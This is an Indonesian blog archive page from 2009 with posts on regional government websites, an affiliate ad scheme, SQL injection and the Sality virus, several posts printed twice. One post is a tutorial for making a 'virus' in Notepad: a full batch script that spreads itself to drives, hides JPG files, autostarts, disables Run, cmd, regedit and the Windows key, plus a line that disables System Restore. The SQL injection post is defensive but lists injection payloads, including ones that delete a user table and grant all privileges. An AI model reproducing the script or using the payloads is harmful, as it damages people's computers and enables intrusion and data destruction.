Pembangunan situs web (web site) bagi pemerintah daerah di tanah air merupakan instruksi Presiden no.3 Tahun 2003. Yang isinya menggalakkan pemanfaatan teknologi informasi (internet) untuk menunjang kegiatan pemerintahannya, baik pemerintah pusat maupun pemerintah daerah untuk terwujudnya e-government di Indonesia.
Dari 471 pemda se-Indonesia hanya 226 yang memiliki situs web sendiri, dan hanya 198 situs yang dikelola secara aktif (data Menkominfo). Sedangkan di Jawa Barat hanya pemda Kabupaten Ciamis yang belum memiliki situs web. Coba anda buka ciamiskab.go.id, dan anda akan mendapatkan tulisan “Maaf, situs ini masih dalam tahap pengembangan”. Dari 26 situs pemda yang ada di Jawa Barat, Kabupaten Garut yang menurut saya memiliki situs jauh lebih baik dibandingkan situs-situs pemda lainnya. Dan yang lainnya masih kurang dalam kelengkapan standar situs Pemda (standar menurut saya).
Apa yang harus ada dalam situs pemda?
Kelengkapan fitur-fiturnya, seperti info tentang daerah dari sektor pariwisata, industri, kondisi, peluang investasi, profil daerah, pemerintahan, dll. Selain itu dari interaksi dengan masyarakat, karena kita tahu bahwa tujuan sebuah situs pemerintahan adalah salah satu media komunikasi antara pemerintah dan masyarakat dan juga sebaliknya. Beberapa dari situs tersebut bahkan tidak interaktif dengan masyarakat, contohnya ada sebuah situs dari salah satu pemda di Jawa Barat menyediakan fitur guest book tetapi setiap keluhan dari pengunjung tidak pernah ditanggapi oleh yang punya situs. Bahkan ada layanan contact us, tetapi via email dan tidak tahu email yang dikirimkan direspon atau tidak.
Untuk info tentang situs-situs pemda se-Jawa Barat silahkan anda unduh di sini.
Lalu sebaiknya pemda harus bagaimana?
Pemda harus meninjau kembali fungsi dari sebuah situs miliknya dan melakukan perbaikan-perbaikan di situs tersebut agar komunikasi dengan masyarakat lebih mudah dan memberikan gambaran kepada masyarakat (pengunjung) tentang informasi-informasi dari daerah tersebut.
Sumber :
Harian Pikiran Rakyat, dan dari situs-situs terkait.
09 Maret 2009
26 Februari 2009
Bikin Duit Lewat Blog?
Ya meskipun bukan dollar yang diraup di sini, tetapi rupiah, ya tidak apa-apa lah yang penting buat menyambung hidup. Pada tulisan saya sebelumnya, saya telah membahas bagaimana meraup dollar lewat Blog, sekarang bagaimana meraup rupiah lewat blog. Konsepnya hampir sama dengan affiliates program di beberapa website besar, tapi ini adalah website affiliasi bikinan anak negeri.
Ya meskipun saya juga baru menjadi anggotanya, dan belum mendapatkan begitu banyak pendapatan. Tapi saya ingin berbagi dengan anda, saya ingin waktu anda ber-internet ria dapat bermanfaat dan tidak hanya mengeluarkan duit untuk biaya warnet, tetapi anda bisa memasukan duit ke rekening anda. Ups maaf malah promosi..
Ini adalah penilaian saya dengan jujur dan tidak ada maksud untuk promosi, menurut saya tidak ada salahnya anda mencoba. Tenang untuk registrasinya anda tidak dipungut biaya sepeser pun, tetapi syarat utamanya anda hanya butuh blog. Bisa lewat wordpress, blogger, dll. Setelah anda registrasi anda hanya perlu meng-copy script text ads untuk blog anda. Dan pasang di blog anda, lalu selesai. Anda hanya tinggal menunggu pengunjung blog anda meng-klick text ads yang sudah anda pasang.
Lalu duitnya masuk kemana? Nah duitnya bakal masuk ke rekening anda. Tentunya sebelumnya anda harus memasukkan no rek, bank, dan nama anda pada link yang judulnya edit profile. Nah.. Gampang kan? Anda tidak perlu punya paypall.
Ok penjelasannya sekian dulu, klick di sini apabila anda tertarik..
Ya meskipun saya juga baru menjadi anggotanya, dan belum mendapatkan begitu banyak pendapatan. Tapi saya ingin berbagi dengan anda, saya ingin waktu anda ber-internet ria dapat bermanfaat dan tidak hanya mengeluarkan duit untuk biaya warnet, tetapi anda bisa memasukan duit ke rekening anda. Ups maaf malah promosi..
Ini adalah penilaian saya dengan jujur dan tidak ada maksud untuk promosi, menurut saya tidak ada salahnya anda mencoba. Tenang untuk registrasinya anda tidak dipungut biaya sepeser pun, tetapi syarat utamanya anda hanya butuh blog. Bisa lewat wordpress, blogger, dll. Setelah anda registrasi anda hanya perlu meng-copy script text ads untuk blog anda. Dan pasang di blog anda, lalu selesai. Anda hanya tinggal menunggu pengunjung blog anda meng-klick text ads yang sudah anda pasang.
Lalu duitnya masuk kemana? Nah duitnya bakal masuk ke rekening anda. Tentunya sebelumnya anda harus memasukkan no rek, bank, dan nama anda pada link yang judulnya edit profile. Nah.. Gampang kan? Anda tidak perlu punya paypall.
Ok penjelasannya sekian dulu, klick di sini apabila anda tertarik..
12 Februari 2009
Membuat Virus dengan Notepad
Pada beberapa website dan blog dijelaskan tentang pembuatan antivirus menggunakan notepad. Tetapi pada tutorial tersebut menggunakan ekstensi *.vbs yang artinya menggunakan bahasa Basic. Sekarang saya akan menjelaskan membuat virus menggunakan notepad dan menggunakan bahasa DOS dan nantinya virus ini akan menggunakan ekstensi *.bat atau kita akan membuat batch file yang intinya merusak suatu sistem. Dalam pembuatan virus ini anda tidak perlu dituntut mengerti tentang pemrograman, hanya saja anda pernah mengerti/belajar tentang DOS.
Nah sekarang silahkan buka notepad, lalu ketikkan script di bawah ini atau apabila anda malas untuk mengetikkannya maka silahkan lakukan copy-paste.
echo off
for %%p in (C D E F G H I J) do copy %0 %%p:
for %%d in (*.jpg) do attrib +h +s %%d:\*.jpg /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v aktifkan /t REG_SZ /d C:\u-hurt-me.bat /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout /v ScancodeMap /t REG_BINARY /d 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00 /f
exit
Setelah anda selesai mengetik script di atas, lalu simpan dengan nama terserah anda dan jangan lupa memberikan embel-embel .bat.
Sedikit penjelasan mengenai virus ini..
Menggandakan dirinya ke dalam beberapa drive.
Menyembunyikan file-file image yang berekstensi jpg.
Fasilitas Run, Command Prompt, Folder Options, Search, dan Start Menu Programs dihilangkan.
Menutup akses ke regedit, command prompt, drive C sebagai system.
Men-disable tombol windows pada keyboard.
Apabila ingin lebih mengerikan lagi tambahkan script berikut ini untuk menutup System Restore.
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
INGAT!!! Apapun yang terjadi pada anda, DI LUAR TANGGUNG JAWAB SAYA. Saya berharap anda bisa lebih bijak dalam menentukan langkah yang akan anda tempuh. Terima kasih..
Nah sekarang silahkan buka notepad, lalu ketikkan script di bawah ini atau apabila anda malas untuk mengetikkannya maka silahkan lakukan copy-paste.
echo off
for %%p in (C D E F G H I J) do copy %0 %%p:
for %%d in (*.jpg) do attrib +h +s %%d:\*.jpg /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v aktifkan /t REG_SZ /d C:\u-hurt-me.bat /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout /v ScancodeMap /t REG_BINARY /d 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00 /f
exit
Setelah anda selesai mengetik script di atas, lalu simpan dengan nama terserah anda dan jangan lupa memberikan embel-embel .bat.
Sedikit penjelasan mengenai virus ini..
Menggandakan dirinya ke dalam beberapa drive.
Menyembunyikan file-file image yang berekstensi jpg.
Fasilitas Run, Command Prompt, Folder Options, Search, dan Start Menu Programs dihilangkan.
Menutup akses ke regedit, command prompt, drive C sebagai system.
Men-disable tombol windows pada keyboard.
Apabila ingin lebih mengerikan lagi tambahkan script berikut ini untuk menutup System Restore.
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
INGAT!!! Apapun yang terjadi pada anda, DI LUAR TANGGUNG JAWAB SAYA. Saya berharap anda bisa lebih bijak dalam menentukan langkah yang akan anda tempuh. Terima kasih..
10 Februari 2009
Hati-hati SQL Injection
Apabila anda adalah seorang administrator sebuah website atau seorang programmer web anda harus jeli dengan berbagai teknik penyerangan seorang Hacker atau Cracker. Ingat seorang programmer yang baik adalah programmer yang dapat meminimalisir kesalahan yang dibuat user baik itu yang disengaja atau tidak. dalam kasus ini saya akan menjelaskan sedikit bagaimana seseorang menyerang dengan teknik SQL Injection, saya memang pemula dan saya hanya mencoba mngingatkan kepada anda yang sudah jago dalam hal ini.
SQL Injection adalah teknik serangan yang menyisipkan query ke dalam suatu sistem, sehingga orang lain (penyerang) dapat mengakses database anda. Tetapi ingat bukan sembarang query yang dimasukkan. Contohnya anda memiliki kode berikut untuk login :
$match=false;
if(isset($POST['submit'])){
$nama=$_POST['nama'];
$pass=$_POST['password'];
$sql="SELECT nama, password FROM user WHERE nama='$nama' AND password='$pass'";
$res=mysql_query($sql);
if($res && mysql_num_rows($res)==1){
$match=true;
mysql_free_result($res);
}
if($match==true){
echo "Account Match";
}else{
echo "Invalid Account";
}
}
Kode program tersebut memang melakukan verifikasi data, tetapi sangat rapuh. Penyerang bisa mengunakan query-query berikut untuk mendapatkan akses secara tidak sah.
admin'#
'OR 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt'#
'OR 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt'#
Contoh SQL Injection di atas adalah contoh yang umum. Dan untuk mencegahnya, gunakan fungsi mysql_real_escape_string() atau addslashes(), seperti pada fungsi myMagic()
$nama=myMagic($_POST['nama']);
$pass=myMagic($_POST['password']);
Contoh lainnya dari SQL Injection adalah dengan menggunakan multiple query, seperti berikut:
$sql="SELECT * FROM buku WHERE kode={$id}"; //$id dari method GET/POST
0; DELETE FROM user //menghapus isi tabel
0; GRANT ALL ON *.* to 'xxx@%'
Ini sangat berbahaya apabila anda menggunakan server database seperti PostgreSQL atau SQLite. Untuk solusinya harus melakukan casting untuk memastikan id bertipe integer.
//simulasi nilai $_POST['id']
$id=(int) myMagic($_POST['id']);
Lalu untuk memeriksa apakah input mengabdung karakter tertentu, gunakan fungsi strpos()
$nama=myMagic($id);
if(strpos($nama, ';')) die('Naughty..Naughty..Naughty'); //periksa apakah karakter ; terdapat pada $nama
Nah sekian solusi yang dapat saya berikan, dan pesan saya tetap berhati-hati karena website Kaspersky jebol karena teknik serangan ini. Terima kasih..
SQL Injection adalah teknik serangan yang menyisipkan query ke dalam suatu sistem, sehingga orang lain (penyerang) dapat mengakses database anda. Tetapi ingat bukan sembarang query yang dimasukkan. Contohnya anda memiliki kode berikut untuk login :
$match=false;
if(isset($POST['submit'])){
$nama=$_POST['nama'];
$pass=$_POST['password'];
$sql="SELECT nama, password FROM user WHERE nama='$nama' AND password='$pass'";
$res=mysql_query($sql);
if($res && mysql_num_rows($res)==1){
$match=true;
mysql_free_result($res);
}
if($match==true){
echo "Account Match";
}else{
echo "Invalid Account";
}
}
Kode program tersebut memang melakukan verifikasi data, tetapi sangat rapuh. Penyerang bisa mengunakan query-query berikut untuk mendapatkan akses secara tidak sah.
admin'#
'OR 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt'#
'OR 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt'#
Contoh SQL Injection di atas adalah contoh yang umum. Dan untuk mencegahnya, gunakan fungsi mysql_real_escape_string() atau addslashes(), seperti pada fungsi myMagic()
$nama=myMagic($_POST['nama']);
$pass=myMagic($_POST['password']);
Contoh lainnya dari SQL Injection adalah dengan menggunakan multiple query, seperti berikut:
$sql="SELECT * FROM buku WHERE kode={$id}"; //$id dari method GET/POST
0; DELETE FROM user //menghapus isi tabel
0; GRANT ALL ON *.* to 'xxx@%'
Ini sangat berbahaya apabila anda menggunakan server database seperti PostgreSQL atau SQLite. Untuk solusinya harus melakukan casting untuk memastikan id bertipe integer.
//simulasi nilai $_POST['id']
$id=(int) myMagic($_POST['id']);
Lalu untuk memeriksa apakah input mengabdung karakter tertentu, gunakan fungsi strpos()
$nama=myMagic($id);
if(strpos($nama, ';')) die('Naughty..Naughty..Naughty'); //periksa apakah karakter ; terdapat pada $nama
Nah sekian solusi yang dapat saya berikan, dan pesan saya tetap berhati-hati karena website Kaspersky jebol karena teknik serangan ini. Terima kasih..
Hati-hati Virus Sality
Sality adalah virus lama yang daya serangnya cukup merepotkan. Dimana virus sality ini menginfeksi file-file berekstensi *.exe yang ada pada harddisk anda. Saya punya pengalaman buruk dengan virus yang satu ini, di mana semua file-file master yang saya miliki ludes di babad. Dan menurut data dari Kaspersky virus Sality.aa adalah pemimpin klasemen virus dari klasemen yang dibuat oleh Kaspersky.
Sebenarnya yang menghapus file-file executable tersebut bukan virusnya, tetapi antivirusnya sendiri. Lho ko'bisa? Memang bisa, kan saya sudah bilang kalau virus ini menginfeksi file-file executable jadi pada saat antivirus melakukan scanning maka file-file executable yang sudah terinfeksi tadi terdefinisi oleh antivirus menjadi sebuah virus. Dan ketika anda melakukan heal atau delete, maka ucapkan bubye pada file-file anda.
Lalu bagaimana solusinya?
Solusinya kalau sudah terlanjur terinfeksi adalah lakukan pembersihan dengan antivirus dan relakan file-file executable anda lenyap.
Lebih baik mencegah daripada mengobati. Itulah intinya.
Baca artikel saya yang judulnya "Aman tanpa Antivirus", lalu terapkan apa yang saya tuliskan pada komputer anda. Kalau anda tidak bisa melakukannya tanpa antivirus, maka pakailah antivirus. dan jangan lupa arsipkan semua file-file executable (master/installer) yang anda miliki dengan WinZip atau WinRAR. Karena virus ini tidak bisa menginfeksi file-file dalam kompresi RAR atau Zip.
Nah sekian solusi terbaik dari saya. Terima kasih..
Sebenarnya yang menghapus file-file executable tersebut bukan virusnya, tetapi antivirusnya sendiri. Lho ko'bisa? Memang bisa, kan saya sudah bilang kalau virus ini menginfeksi file-file executable jadi pada saat antivirus melakukan scanning maka file-file executable yang sudah terinfeksi tadi terdefinisi oleh antivirus menjadi sebuah virus. Dan ketika anda melakukan heal atau delete, maka ucapkan bubye pada file-file anda.
Lalu bagaimana solusinya?
Solusinya kalau sudah terlanjur terinfeksi adalah lakukan pembersihan dengan antivirus dan relakan file-file executable anda lenyap.
Lebih baik mencegah daripada mengobati. Itulah intinya.
Baca artikel saya yang judulnya "Aman tanpa Antivirus", lalu terapkan apa yang saya tuliskan pada komputer anda. Kalau anda tidak bisa melakukannya tanpa antivirus, maka pakailah antivirus. dan jangan lupa arsipkan semua file-file executable (master/installer) yang anda miliki dengan WinZip atau WinRAR. Karena virus ini tidak bisa menginfeksi file-file dalam kompresi RAR atau Zip.
Nah sekian solusi terbaik dari saya. Terima kasih..
Langganan:
Postingan (Atom)